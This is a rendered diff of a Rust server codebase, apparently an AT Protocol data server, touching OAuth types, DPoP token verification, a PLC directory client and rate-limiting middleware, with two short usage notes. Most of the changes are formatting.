pub struct SessionId(pub String);
16
+
17
#[derive(Debug, Clone, Serialize, Deserialize)]
18
pub struct Code(pub String);
19
+
20
#[derive(Debug, Clone, Serialize, Deserialize)]
21
pub struct RefreshToken(pub String);
22
+
23
impl RequestId {
24
pub fn generate() -> Self {
25
Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
26
}
27
}
28
+
29
impl TokenId {
30
pub fn generate() -> Self {
31
Self(uuid::Uuid::new_v4().to_string())
32
}
33
}
34
+
35
impl DeviceId {
36
pub fn generate() -> Self {
37
Self(uuid::Uuid::new_v4().to_string())
38
}
39
}
40
+
41
impl SessionId {
42
pub fn generate() -> Self {
43
Self(uuid::Uuid::new_v4().to_string())
44
}
45
}
46
+
47
impl Code {
48
pub fn generate() -> Self {
49
use rand::Rng;
···
54
))
55
}
56
}
57
+
58
impl RefreshToken {
59
pub fn generate() -> Self {
60
use rand::Rng;
···
65
))
66
}
67
}
68
+
69
#[derive(Debug, Clone, Serialize, Deserialize)]
70
#[serde(tag = "method")]
71
pub enum ClientAuth {
···
78
#[serde(rename = "private_key_jwt")]
79
PrivateKeyJwt { client_assertion: String },
80
}
81
+
82
#[derive(Debug, Clone, Serialize, Deserialize)]
83
pub struct AuthorizationRequestParameters {
84
pub response_type: String,
···
93
#[serde(flatten)]
94
pub extra: Option<JsonValue>,
95
}
96
+
97
#[derive(Debug, Clone)]
98
pub struct RequestData {
99
pub client_id: String,
···
104
pub device_id: Option<String>,
105
pub code: Option<String>,
106
}
107
+
108
#[derive(Debug, Clone)]
109
pub struct DeviceData {
110
pub session_id: String,
···
112
pub ip_address: String,
113
pub last_seen_at: DateTime<Utc>,
114
}
115
+
116
#[derive(Debug, Clone)]
117
pub struct TokenData {
118
pub did: String,
···
129
pub current_refresh_token: Option<String>,
130
pub scope: Option<String>,
131
}
132
+
133
#[derive(Debug, Clone, Serialize, Deserialize)]
134
pub struct AuthorizedClientData {
135
pub scope: Option<String>,
136
pub remember: bool,
137
}
138
+
139
#[derive(Debug, Clone, Serialize, Deserialize)]
140
pub struct OAuthClientMetadata {
141
pub client_id: String,
···
152
pub jwks_uri: Option<String>,
153
pub application_type: Option<String>,
154
}
155
+
156
#[derive(Debug, Clone, Serialize, Deserialize)]
157
pub struct ProtectedResourceMetadata {
158
pub resource: String,
···
161
pub scopes_supported: Vec<String>,
162
pub resource_documentation: Option<String>,
163
}
164
+
165
#[derive(Debug, Clone, Serialize, Deserialize)]
166
pub struct AuthorizationServerMetadata {
167
pub issuer: String,
···
180
pub dpop_signing_alg_values_supported: Option<Vec<String>>,
181
pub authorization_response_iss_parameter_supported: Option<bool>,
182
}
183
+
184
#[derive(Debug, Clone, Serialize, Deserialize)]
185
pub struct ParResponse {
186
pub request_uri: String,
187
pub expires_in: u64,
188
}
189
+
190
#[derive(Debug, Clone, Serialize, Deserialize)]
191
pub struct TokenResponse {
192
pub access_token: String,
···
199
#[serde(skip_serializing_if = "Option::is_none")]
200
pub sub: Option<String>,
201
}
202
+
203
#[derive(Debug, Clone, Serialize, Deserialize)]
204
pub struct TokenRequest {
205
pub grant_type: String,
···
210
pub client_id: Option<String>,
211
pub client_secret: Option<String>,
212
}
213
+
214
#[derive(Debug, Clone, Serialize, Deserialize)]
215
pub struct DPoPClaims {
216
pub jti: String,
···
222
#[serde(skip_serializing_if = "Option::is_none")]
223
pub nonce: Option<String>,
224
}
225
+
226
#[derive(Debug, Clone, Serialize, Deserialize)]
227
pub struct JwkPublicKey {
228
pub kty: String,
···
234
pub kid: Option<String>,
235
pub alg: Option<String>,
236
}
237
+
238
#[derive(Debug, Clone, Serialize, Deserialize)]
239
pub struct Jwks {
240
pub keys: Vec<JwkPublicKey>,
+14
src/oauth/verify.rs
···
10
use sha2::Sha256;
11
use sqlx::PgPool;
12
use subtle::ConstantTimeEq;
13
use crate::config::AuthConfig;
14
use crate::state::AppState;
15
use super::db;
16
use super::dpop::DPoPVerifier;
17
use super::OAuthError;
18
pub struct OAuthTokenInfo {
19
pub did: String,
20
pub token_id: String,
···
22
pub scope: Option<String>,
23
pub dpop_jkt: Option<String>,
24
}
25
pub struct VerifyResult {
26
pub did: String,
27
pub token_id: String,
28
pub client_id: String,
29
pub scope: Option<String>,
30
}
31
pub async fn verify_oauth_access_token(
32
pool: &PgPool,
33
access_token: &str,
···
69
scope: token_data.scope,
70
})
71
}
72
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
73
let parts: Vec<&str> = token.split('.').collect();
74
if parts.len() != 3 {
···
141
dpop_jkt,
142
})
143
}
144
fn compute_ath(access_token: &str) -> String {
145
use sha2::Digest;
146
let mut hasher = Sha256::new();
···
148
let hash = hasher.finalize();
149
URL_SAFE_NO_PAD.encode(&hash)
150
}
151
pub fn generate_dpop_nonce() -> String {
152
let config = AuthConfig::get();
153
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
154
verifier.generate_nonce()
155
}
156
pub struct OAuthUser {
157
pub did: String,
158
pub client_id: Option<String>,
159
pub scope: Option<String>,
160
pub is_oauth: bool,
161
}
162
pub struct OAuthAuthError {
163
pub status: StatusCode,
164
pub error: String,
165
pub message: String,
166
pub dpop_nonce: Option<String>,
167
}
168
impl IntoResponse for OAuthAuthError {
169
fn into_response(self) -> Response {
170
let mut response = (
···
184
response
185
}
186
}
187
impl FromRequestParts<AppState> for OAuthUser {
188
type Rejection = OAuthAuthError;
189
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
190
let auth_header = parts
191
.headers
···
258
}
259
}
260
}
261
struct LegacyAuthResult {
262
did: String,
263
}
264
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
265
match crate::auth::validate_bearer_token(pool, token).await {
266
Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
···
10
use sha2::Sha256;
11
use sqlx::PgPool;
12
use subtle::ConstantTimeEq;
13
+
14
use crate::config::AuthConfig;
15
use crate::state::AppState;
16
use super::db;
17
use super::dpop::DPoPVerifier;
18
use super::OAuthError;
19
+
20
pub struct OAuthTokenInfo {
21
pub did: String,
22
pub token_id: String,
···
24
pub scope: Option<String>,
25
pub dpop_jkt: Option<String>,
26
}
27
+
28
pub struct VerifyResult {
29
pub did: String,
30
pub token_id: String,
31
pub client_id: String,
32
pub scope: Option<String>,
33
}
34
+
35
pub async fn verify_oauth_access_token(
36
pool: &PgPool,
37
access_token: &str,
···
73
scope: token_data.scope,
74
})
75
}
76
+
77
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
78
let parts: Vec<&str> = token.split('.').collect();
79
if parts.len() != 3 {
···
146
dpop_jkt,
147
})
148
}
149
+
150
fn compute_ath(access_token: &str) -> String {
151
use sha2::Digest;
152
let mut hasher = Sha256::new();
···
154
let hash = hasher.finalize();
155
URL_SAFE_NO_PAD.encode(&hash)
156
}
157
+
158
pub fn generate_dpop_nonce() -> String {
159
let config = AuthConfig::get();
160
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
161
verifier.generate_nonce()
162
}
163
+
164
pub struct OAuthUser {
165
pub did: String,
166
pub client_id: Option<String>,
167
pub scope: Option<String>,
168
pub is_oauth: bool,
169
}
170
+
171
pub struct OAuthAuthError {
172
pub status: StatusCode,
173
pub error: String,
174
pub message: String,
175
pub dpop_nonce: Option<String>,
176
}
177
+
178
impl IntoResponse for OAuthAuthError {
179
fn into_response(self) -> Response {
180
let mut response = (
···
194
response
195
}
196
}
197
+
198
impl FromRequestParts<AppState> for OAuthUser {
199
type Rejection = OAuthAuthError;
200
+
201
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
202
let auth_header = parts
203
.headers
···
270
}
271
}
272
}
273
+
274
struct LegacyAuthResult {
275
did: String,
276
}
277
+
278
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
279
match crate::auth::validate_bearer_token(pool, token).await {
280
Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
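Because OAuthUser implements FromRequestParts<AppState> (see verify.rs above), route handlers can simply take it as an argument and the Bearer/DPoP verification runs before the handler body. A small sketch under that assumption; the route path, handler name, and exact import paths are illustrative only:

use axum::{routing::get, Router};

use crate::oauth::verify::OAuthUser;
use crate::state::AppState;

// Hypothetical handler: extraction performs the token checks from verify.rs,
// so `user` is already authenticated when this body runs.
async fn whoami(user: OAuthUser) -> String {
    format!("did={} client_id={:?} scope={:?}", user.did, user.client_id, user.scope)
}

// Registered on a Router carrying the same AppState the extractor expects.
fn oauth_demo_routes() -> Router<AppState> {
    Router::new().route("/whoami", get(whoami))
}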
+30
src/plc/mod.rs
···
8
use std::collections::HashMap;
9
use std::time::Duration;
10
use thiserror::Error;
11
#[derive(Error, Debug)]
12
pub enum PlcError {
13
#[error("HTTP request failed: {0}")]
···
27
#[error("Service unavailable (circuit breaker open)")]
28
CircuitBreakerOpen,
29
}
30
#[derive(Debug, Clone, Serialize, Deserialize)]
31
pub struct PlcOperation {
32
#[serde(rename = "type")]
···
42
#[serde(skip_serializing_if = "Option::is_none")]
43
pub sig: Option<String>,
44
}
45
#[derive(Debug, Clone, Serialize, Deserialize)]
46
pub struct PlcService {
47
#[serde(rename = "type")]
48
pub service_type: String,
49
pub endpoint: String,
50
}
51
#[derive(Debug, Clone, Serialize, Deserialize)]
52
pub struct PlcTombstone {
53
#[serde(rename = "type")]
···
56
#[serde(skip_serializing_if = "Option::is_none")]
57
pub sig: Option<String>,
58
}
59
#[derive(Debug, Clone, Serialize, Deserialize)]
60
#[serde(untagged)]
61
pub enum PlcOpOrTombstone {
62
Operation(PlcOperation),
63
Tombstone(PlcTombstone),
64
}
65
impl PlcOpOrTombstone {
66
pub fn is_tombstone(&self) -> bool {
67
match self {
···
70
}
71
}
72
}
73
pub struct PlcClient {
74
base_url: String,
75
client: Client,
76
}
77
impl PlcClient {
78
pub fn new(base_url: Option<String>) -> Self {
79
let base_url = base_url.unwrap_or_else(|| {
···
99
client,
100
}
101
}
102
fn encode_did(did: &str) -> String {
103
urlencoding::encode(did).to_string()
104
}
105
pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
106
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
107
let response = self.client.get(&url).send().await?;
···
118
}
119
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
120
}
121
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
122
let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
123
let response = self.client.get(&url).send().await?;
···
134
}
135
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
136
}
137
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
138
let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
139
let response = self.client.get(&url).send().await?;
···
150
}
151
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
152
}
153
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
154
let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
155
let response = self.client.get(&url).send().await?;
···
166
}
167
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
168
}
169
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
170
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
171
let response = self.client
···
184
Ok(())
185
}
186
}
187
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
188
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
189
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
195
let cid = cid::Cid::new_v1(0x71, multihash);
196
Ok(cid.to_string())
197
}
198
pub fn sign_operation(
199
operation: &Value,
200
signing_key: &SigningKey,
···
213
}
214
Ok(op)
215
}
216
pub fn create_update_op(
217
last_op: &PlcOpOrTombstone,
218
rotation_keys: Option<Vec<String>>,
···
250
};
251
serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
252
}
253
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
254
let verifying_key = signing_key.verifying_key();
255
let point = verifying_key.to_encoded_point(true);
···
259
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
260
format!("did:key:{}", encoded)
261
}
262
pub struct GenesisResult {
263
pub did: String,
264
pub signed_operation: Value,
265
}
266
pub fn create_genesis_operation(
267
signing_key: &SigningKey,
268
rotation_key: &str,
···
298
signed_operation: signed_op,
299
})
300
}
301
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
302
let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
303
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
308
let truncated = &encoded[..24];
309
Ok(format!("did:plc:{}", truncated))
310
}
311
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
312
let obj = op.as_object()
313
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
336
}
337
Ok(())
338
}
339
pub struct PlcValidationContext {
340
pub server_rotation_key: String,
341
pub expected_signing_key: String,
342
pub expected_handle: String,
343
pub expected_pds_endpoint: String,
344
}
345
pub fn validate_plc_operation_for_submission(
346
op: &Value,
347
ctx: &PlcValidationContext,
···
407
}
408
Ok(())
409
}
410
pub fn verify_operation_signature(
411
op: &Value,
412
rotation_keys: &[String],
···
434
}
435
Ok(false)
436
}
437
fn verify_signature_with_did_key(
438
did_key: &str,
439
message: &[u8],
···
461
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
462
Ok(verifying_key.verify(message, signature).is_ok())
463
}
464
#[cfg(test)]
465
mod tests {
466
use super::*;
467
#[test]
468
fn test_signing_key_to_did_key() {
469
let key = SigningKey::random(&mut rand::thread_rng());
470
let did_key = signing_key_to_did_key(&key);
471
assert!(did_key.starts_with("did:key:z"));
472
}
473
#[test]
474
fn test_cid_for_cbor() {
475
let value = json!({
···
479
let cid = cid_for_cbor(&value).unwrap();
480
assert!(cid.starts_with("bafyrei"));
481
}
482
#[test]
483
fn test_sign_operation() {
484
let key = SigningKey::random(&mut rand::thread_rng());
···
8
use std::collections::HashMap;
9
use std::time::Duration;
10
use thiserror::Error;
11
+
12
#[derive(Error, Debug)]
13
pub enum PlcError {
14
#[error("HTTP request failed: {0}")]
···
28
#[error("Service unavailable (circuit breaker open)")]
29
CircuitBreakerOpen,
30
}
31
+
32
#[derive(Debug, Clone, Serialize, Deserialize)]
33
pub struct PlcOperation {
34
#[serde(rename = "type")]
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub sig: Option<String>,
46
}
47
+
48
#[derive(Debug, Clone, Serialize, Deserialize)]
49
pub struct PlcService {
50
#[serde(rename = "type")]
51
pub service_type: String,
52
pub endpoint: String,
53
}
54
+
55
#[derive(Debug, Clone, Serialize, Deserialize)]
56
pub struct PlcTombstone {
57
#[serde(rename = "type")]
···
60
#[serde(skip_serializing_if = "Option::is_none")]
61
pub sig: Option<String>,
62
}
63
+
64
#[derive(Debug, Clone, Serialize, Deserialize)]
65
#[serde(untagged)]
66
pub enum PlcOpOrTombstone {
67
Operation(PlcOperation),
68
Tombstone(PlcTombstone),
69
}
70
+
71
impl PlcOpOrTombstone {
72
pub fn is_tombstone(&self) -> bool {
73
match self {
···
76
}
77
}
78
}
79
+
80
pub struct PlcClient {
81
base_url: String,
82
client: Client,
83
}
84
+
85
impl PlcClient {
86
pub fn new(base_url: Option<String>) -> Self {
87
let base_url = base_url.unwrap_or_else(|| {
···
107
client,
108
}
109
}
110
+
111
fn encode_did(did: &str) -> String {
112
urlencoding::encode(did).to_string()
113
}
114
+
115
pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
116
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
117
let response = self.client.get(&url).send().await?;
···
128
}
129
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
130
}
131
+
132
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
133
let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
134
let response = self.client.get(&url).send().await?;
···
145
}
146
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
147
}
148
+
149
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
150
let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
151
let response = self.client.get(&url).send().await?;
···
162
}
163
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
164
}
165
+
166
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
167
let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
168
let response = self.client.get(&url).send().await?;
···
179
}
180
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
181
}
182
+
183
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
184
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
185
let response = self.client
···
198
Ok(())
199
}
200
}
201
+
202
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
203
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
204
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
210
let cid = cid::Cid::new_v1(0x71, multihash);
211
Ok(cid.to_string())
212
}
213
+
214
pub fn sign_operation(
215
operation: &Value,
216
signing_key: &SigningKey,
···
229
}
230
Ok(op)
231
}
232
+
233
pub fn create_update_op(
234
last_op: &PlcOpOrTombstone,
235
rotation_keys: Option<Vec<String>>,
···
267
};
268
serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
269
}
270
+
271
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
272
let verifying_key = signing_key.verifying_key();
273
let point = verifying_key.to_encoded_point(true);
···
277
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
278
format!("did:key:{}", encoded)
279
}
280
+
281
pub struct GenesisResult {
282
pub did: String,
283
pub signed_operation: Value,
284
}
285
+
286
pub fn create_genesis_operation(
287
signing_key: &SigningKey,
288
rotation_key: &str,
···
318
signed_operation: signed_op,
319
})
320
}
321
+
322
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
323
let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
324
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
329
let truncated = &encoded[..24];
330
Ok(format!("did:plc:{}", truncated))
331
}
332
+
333
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
334
let obj = op.as_object()
335
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
358
}
359
Ok(())
360
}
361
+
362
pub struct PlcValidationContext {
363
pub server_rotation_key: String,
364
pub expected_signing_key: String,
365
pub expected_handle: String,
366
pub expected_pds_endpoint: String,
367
}
368
+
369
pub fn validate_plc_operation_for_submission(
370
op: &Value,
371
ctx: &PlcValidationContext,
···
431
}
432
Ok(())
433
}
434
+
435
pub fn verify_operation_signature(
436
op: &Value,
437
rotation_keys: &[String],
···
459
}
460
Ok(false)
461
}
462
+
463
fn verify_signature_with_did_key(
464
did_key: &str,
465
message: &[u8],
···
487
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
488
Ok(verifying_key.verify(message, signature).is_ok())
489
}
490
+
491
#[cfg(test)]
492
mod tests {
493
use super::*;
494
+
495
#[test]
496
fn test_signing_key_to_did_key() {
497
let key = SigningKey::random(&mut rand::thread_rng());
498
let did_key = signing_key_to_did_key(&key);
499
assert!(did_key.starts_with("did:key:z"));
500
}
501
+
502
#[test]
503
fn test_cid_for_cbor() {
504
let value = json!({
···
508
let cid = cid_for_cbor(&value).unwrap();
509
assert!(cid.starts_with("bafyrei"));
510
}
511
+
512
#[test]
513
fn test_sign_operation() {
514
let key = SigningKey::random(&mut rand::thread_rng());
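For context on how `PlcClient` gets used, here is a minimal sketch that resolves a DID document and its audit log from the directory. The `#[tokio::main]` wrapper and the placeholder DID are illustrative assumptions, not part of this change:

```rust
use crate::plc::{PlcClient, PlcError};

#[tokio::main]
async fn main() -> Result<(), PlcError> {
    // None falls back to the default directory URL chosen in PlcClient::new.
    let client = PlcClient::new(None);

    let did = "did:plc:placeholderplaceholder"; // illustrative placeholder
    let document = client.get_document(did).await?;
    println!("document: {document}");

    let audit_log = client.get_audit_log(did).await?;
    println!("{} audit entries", audit_log.len());
    Ok(())
}
```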
+34
-5
src/rate_limit.rs
···
16
num::NonZeroU32,
17
sync::Arc,
18
};
19
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
20
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
21
-
// NOTE: For production deployments with high traffic, prefer using the distributed rate
22
-
// limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory
23
-
// rate limiters here don't automatically clean up expired entries, which can cause
24
-
// memory growth over time with many unique client IPs. The distributed rate limiter
25
-
// uses Redis TTL for automatic cleanup and works correctly across multiple instances.
26
#[derive(Clone)]
27
pub struct RateLimiters {
28
pub login: Arc<KeyedRateLimiter>,
···
37
pub app_password: Arc<KeyedRateLimiter>,
38
pub email_update: Arc<KeyedRateLimiter>,
39
}
40
impl Default for RateLimiters {
41
fn default() -> Self {
42
Self::new()
43
}
44
}
45
impl RateLimiters {
46
pub fn new() -> Self {
47
Self {
···
80
)),
81
}
82
}
83
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
self.login = Arc::new(RateLimiter::keyed(
85
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
));
87
self
88
}
89
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
90
self.oauth_token = Arc::new(RateLimiter::keyed(
91
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
92
));
93
self
94
}
95
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
96
self.oauth_authorize = Arc::new(RateLimiter::keyed(
97
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
98
));
99
self
100
}
101
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
102
self.password_reset = Arc::new(RateLimiter::keyed(
103
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
104
));
105
self
106
}
107
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
108
self.account_creation = Arc::new(RateLimiter::keyed(
109
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
110
));
111
self
112
}
113
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
114
self.email_update = Arc::new(RateLimiter::keyed(
115
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
117
self
118
}
119
}
120
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
121
if let Some(forwarded) = headers.get("x-forwarded-for") {
122
if let Ok(value) = forwarded.to_str() {
···
125
}
126
}
127
}
128
if let Some(real_ip) = headers.get("x-real-ip") {
129
if let Ok(value) = real_ip.to_str() {
130
return value.trim().to_string();
131
}
132
}
133
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
134
}
135
fn rate_limit_response() -> Response {
136
(
137
StatusCode::TOO_MANY_REQUESTS,
···
142
)
143
.into_response()
144
}
145
pub async fn login_rate_limit(
146
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
149
next: Next,
150
) -> Response {
151
let client_ip = extract_client_ip(request.headers(), Some(addr));
152
if limiters.login.check_key(&client_ip).is_err() {
153
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
154
return rate_limit_response();
155
}
156
next.run(request).await
157
}
158
pub async fn oauth_token_rate_limit(
159
ConnectInfo(addr): ConnectInfo<SocketAddr>,
160
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
162
next: Next,
163
) -> Response {
164
let client_ip = extract_client_ip(request.headers(), Some(addr));
165
if limiters.oauth_token.check_key(&client_ip).is_err() {
166
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
167
return rate_limit_response();
168
}
169
next.run(request).await
170
}
171
pub async fn password_reset_rate_limit(
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
next: Next,
176
) -> Response {
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
if limiters.password_reset.check_key(&client_ip).is_err() {
179
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
180
return rate_limit_response();
181
}
182
next.run(request).await
183
}
184
pub async fn account_creation_rate_limit(
185
ConnectInfo(addr): ConnectInfo<SocketAddr>,
186
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
188
next: Next,
189
) -> Response {
190
let client_ip = extract_client_ip(request.headers(), Some(addr));
191
if limiters.account_creation.check_key(&client_ip).is_err() {
192
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
193
return rate_limit_response();
194
}
195
next.run(request).await
196
}
197
#[cfg(test)]
198
mod tests {
199
use super::*;
200
#[test]
201
fn test_rate_limiters_creation() {
202
let limiters = RateLimiters::new();
203
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
204
}
205
#[test]
206
fn test_rate_limiter_exhaustion() {
207
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
208
let key = "test_ip".to_string();
209
assert!(limiter.check_key(&key).is_ok());
210
assert!(limiter.check_key(&key).is_ok());
211
assert!(limiter.check_key(&key).is_err());
212
}
213
#[test]
214
fn test_different_keys_have_separate_limits() {
215
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
216
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
217
assert!(limiter.check_key(&"ip1".to_string()).is_err());
218
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
219
}
220
#[test]
221
fn test_builder_pattern() {
222
let limiters = RateLimiters::new()
···
224
.with_oauth_token_limit(60)
225
.with_password_reset_limit(3)
226
.with_account_creation_limit(5);
227
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
228
}
229
}
···
16
num::NonZeroU32,
17
sync::Arc,
18
};
19
+
20
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
21
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
22
+
23
#[derive(Clone)]
24
pub struct RateLimiters {
25
pub login: Arc<KeyedRateLimiter>,
···
34
pub app_password: Arc<KeyedRateLimiter>,
35
pub email_update: Arc<KeyedRateLimiter>,
36
}
37
+
38
impl Default for RateLimiters {
39
fn default() -> Self {
40
Self::new()
41
}
42
}
43
+
44
impl RateLimiters {
45
pub fn new() -> Self {
46
Self {
···
79
)),
80
}
81
}
82
+
83
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
self.login = Arc::new(RateLimiter::keyed(
85
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
));
87
self
88
}
89
+
90
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
91
self.oauth_token = Arc::new(RateLimiter::keyed(
92
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
93
));
94
self
95
}
96
+
97
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
98
self.oauth_authorize = Arc::new(RateLimiter::keyed(
99
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
100
));
101
self
102
}
103
+
104
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
105
self.password_reset = Arc::new(RateLimiter::keyed(
106
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
107
));
108
self
109
}
110
+
111
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
112
self.account_creation = Arc::new(RateLimiter::keyed(
113
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
114
));
115
self
116
}
117
+
118
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
119
self.email_update = Arc::new(RateLimiter::keyed(
120
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
122
self
123
}
124
}
125
+
126
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
127
if let Some(forwarded) = headers.get("x-forwarded-for") {
128
if let Ok(value) = forwarded.to_str() {
···
131
}
132
}
133
}
134
+
135
if let Some(real_ip) = headers.get("x-real-ip") {
136
if let Ok(value) = real_ip.to_str() {
137
return value.trim().to_string();
138
}
139
}
140
+
141
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
142
}
143
+
144
fn rate_limit_response() -> Response {
145
(
146
StatusCode::TOO_MANY_REQUESTS,
···
151
)
152
.into_response()
153
}
154
+
155
pub async fn login_rate_limit(
156
ConnectInfo(addr): ConnectInfo<SocketAddr>,
157
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
159
next: Next,
160
) -> Response {
161
let client_ip = extract_client_ip(request.headers(), Some(addr));
162
+
163
if limiters.login.check_key(&client_ip).is_err() {
164
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
165
return rate_limit_response();
166
}
167
+
168
next.run(request).await
169
